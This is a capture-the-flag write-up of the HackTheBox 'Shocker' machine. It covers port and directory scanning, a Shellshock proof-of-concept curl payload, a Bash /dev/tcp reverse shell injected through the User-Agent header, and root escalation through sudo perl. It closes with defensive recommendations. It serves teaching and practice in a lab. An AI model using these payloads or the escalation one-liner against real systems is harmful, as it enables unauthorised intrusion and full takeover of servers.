Share
## https://sploitus.com/exploit?id=11E67395-5053-59B0-976E-309242811528
# HackTheBox: Shocker Writeup
A structured and professional walkthrough showcasing the identification and manual exploitation of the critical **Shellshock** vulnerability, followed by local privilege escalation via misconfigured `sudo` rights on a Linux target.

---

## Technical Overview
* **Target OS:** Linux
* **IP Address:** `10.10.10.56`
* **Difficulty:** Easy
* **Core Vulnerabilities:** Shellshock (CVE-2014-6271) & Misconfigured Sudo Privileges (`/usr/bin/perl`)
* **Objective:** Gain initial user access via CGI environment variable injection and escalate to root.

---

## 1. Enumeration & Reconnaissance

The assessment begins with a rapid, full-port TCP SYN scan targeting only open ports (`--open`) while bypassing host discovery (`-Pn`) and DNS resolution (`-n`) to accelerate footprinting.

```bash
nmap -Pn -n -p- -sS --min-rate 5000 --open 10.10.10.56

```

### Targeted Service & Vulnerability Profiling

The initial sweep reveals two active services. We conduct a secondary targeted scan to execute aggressive version detection (`-sCV`) and script-based vulnerability assessment:

```bash
nmap -sCV -p80,2222 --script="safe and vuln" 10.10.10.56

```

### Scan Results

* **Port 80:** HTTP (Apache Web Server)
* **Port 2222:** SSH (Non-standard port)

---

## 2. Directory Fuzzing & Web Enumeration

In parallel with our vulnerability scans, we initiate web directory brute-forcing using `gobuster` to map out hidden resources on the Apache server. We leverage a standard wordlist from the SecLists framework:

```bash
gobuster dir -u [http://10.10.10.56/](http://10.10.10.56/) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 20

```

### Crucial Finding

The fuzzing process identifies an unindexed **`/cgi-bin/`** directory. In legacy web deployments, Apache servers utilize the Common Gateway Interface (CGI) to execute server-side scripts. Given the machine name and the presence of this folder, we aggressively look for executable scripts (e.g., `.sh`, `.cgi`) that might be susceptible to environmental variable injection flaws.

Further enumeration reveals a script named `user.sh` residing inside the `/cgi-bin/` directory.

---

## 3. Weaponization & Initial Foothold

### Testing for Shellshock (PoC)

The **Shellshock (CVE-2014-6271)** vulnerability allows attackers to execute arbitrary operating system commands by injecting malicious function definitions inside HTTP request headers (such as `User-Agent`) processed by vulnerable Bash instances.

We craft a customized `curl` command to send a Proof of Concept (PoC) payload designed to force the remote system to execute the `/usr/bin/id` command:

```bash
curl -H "User-Agent: () { :; }; echo; /usr/bin/id" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)

```

* **Result:** The web server responds with the output of the `id` command, validating **authenticated-like unauthenticated Remote Code Execution (RCE)**.

### Establishing a Reverse Shell

To upgrade our execution vector into an interactive session, we establish a local Netcat listener on our attack platform:

```bash
nc -lvnp 4444

```

Next, we inject a native Bash reverse shell string within the malicious `User-Agent` header to force a callback over TCP:

```bash
curl -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp//4444 0>&1" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)

```

Upon successful execution, we receive a stable low-privilege shell:

```bash
$ whoami
shelly

```

---

## 4. Local Privilege Escalation (LPE)

With a functional user context on the system, we audit our local restrictions. We query the `sudo` configuration to determine if the `shelly` user is authorized to execute commands with elevated permissions without supplying a password:

```bash
sudo -l

```

### Sudo Configuration Audit

The output reveals the following high-risk entry:

```text
User shelly may run the following commands on shocker:
    (root) NOPASSWD: /usr/bin/perl

```

### Exploiting Perl via GTFOBins

Because we have unrestricted, unauthenticated access to execute the **`perl`** binary as `root`, we can easily break out of the binary restrictions. Cross-referencing **GTFOBins**, we find an execution wrapper that instructs Perl to drop into a native system shell (`/bin/sh`) retaining the execution identity context (`root`):

```bash
sudo -u root perl -e 'exec "/bin/sh"'

```

We immediately achieve full administrative execution context:

```bash
# whoami
root

```

---

## 5. Post-Exploitation & Looting

Now that root access has been established, we navigate to the relevant home directories to retrieve the compromise proofs.

```bash
# Access User Flag
cat /home/shelly/user.txt

# Access Root Flag
cat /root/root.txt

```

---

## Key Takeaways & Defensive Recommendations

1. **Patch Inherently Vulnerable Software:** Shellshock is a legacy, catastrophic vulnerability in GNU Bash. Ensure all server components receive proactive security patches for foundational utilities.
2. **Secure the CGI Environment:** If CGI scripts must be retained, ensure they run under isolated, sandboxed execution models (e.g., using specialized container runtimes or chroot environments) and avoid using outdated, vulnerable default shells.
3. **Enforce Strict Principle of Least Privilege:** Granting standard users unrestricted access to execute powerful built-in interpreters like `perl`, `python`, or `bash` via `sudo` introduces instant escalation vectors. Sudo access should be confined to non-interactive, highly controlled administrative scripts.

```

```